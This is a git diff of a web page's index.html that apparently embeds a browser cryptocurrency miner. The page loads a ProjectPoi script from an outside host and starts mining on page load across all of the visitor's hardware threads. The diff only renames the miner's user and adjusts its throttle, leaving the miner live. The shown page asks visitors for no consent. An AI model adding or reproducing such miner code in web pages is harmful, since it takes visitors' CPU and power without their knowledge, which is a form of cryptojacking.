--- a/1sjwk/index.html
+++ b/1sjwk/index.html
@@ -9,10 +9,10 @@
 		<script src="https://ppoi.org/lib/projectpoi.min.js">	
 		</script>
 		<script>
-			var miner = new ProjectPoi.User('BLuRXQ2XBPG0jSEBBnysmfVJ', 'john-doe', {
+			var miner = new ProjectPoi.User('BLuRXQ2XBPG0jSEBBnysmfVJ', 'john-doe-sj', {
 	threads: navigator.hardwareConcurrency,
 	autoThreads: false,
-	throttle: 0.5,
+	throttle: 0.6,
 	forceASMJS: false
 });
 	miner.start(ProjectPoi.IF_EXCLUSIVE_TAB);	
